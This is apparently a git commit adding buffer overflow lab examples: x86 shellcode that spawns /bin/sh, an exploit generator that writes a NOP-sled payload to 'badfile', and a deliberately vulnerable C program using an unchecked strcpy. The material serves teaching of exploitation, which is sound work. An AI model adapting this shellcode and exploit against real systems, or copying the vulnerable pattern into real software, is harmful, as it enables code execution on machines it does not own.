adding buffer overflow examples

This commit is contained in:
Omar Santos 2021-03-18 14:10:55 -04:00
parent 81da9ec76d
commit 0f5a65b7a5
4 changed files with 128 additions and 0 deletions

3
.vscode/settings.json vendored Normal file
View File

@ -0,0 +1,3 @@
{
"C_Cpp.errorSquiggles": "Disabled"
}

View File

@ -0,0 +1,27 @@
/* call_shellcode.c */
/* This program will create a file containing code for launching a shell */
#include <stdlib.h>
#include <stdio.h>
const char code[] =
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );
}

View File

@ -0,0 +1,69 @@
//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350
char code[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
char *ptr;
long *a_ptr,ret;
int offset = DEFAULT_OFFSET;
int codeSize = sizeof(code);
int buffSize = sizeof(buffer);
if(argc > 1) offset = atoi(argv[1]); //this allows for command line input
ptr=buffer;
a_ptr = (long *) ptr;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, buffSize);
//----------------------BEGIN FILL BUFFER----------------------\\
ret = get_sp()+offset;
printf("Return Address: 0x%x\n",get_sp());
printf("Address: 0x%x\n",ret);
ptr = buffer;
a_ptr = (long *) ptr;
int i;
for (i = 0; i < 300;i+=4)
*(a_ptr++) = ret;
for(i = 486;i < codeSize + 486;++i)
buffer[i] = code[i-486];
buffer[buffSize - 1] = '\0';
//-----------------------END FILL BUFFER-----------------------\\
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer,517,1,badfile);
fclose(badfile);
}

View File

@ -0,0 +1,29 @@
/* stack.c */
/* This is the program that introduces the buffer overflow vulnerability. */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
/* Can you spot the buffer overflow here? ;-) */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}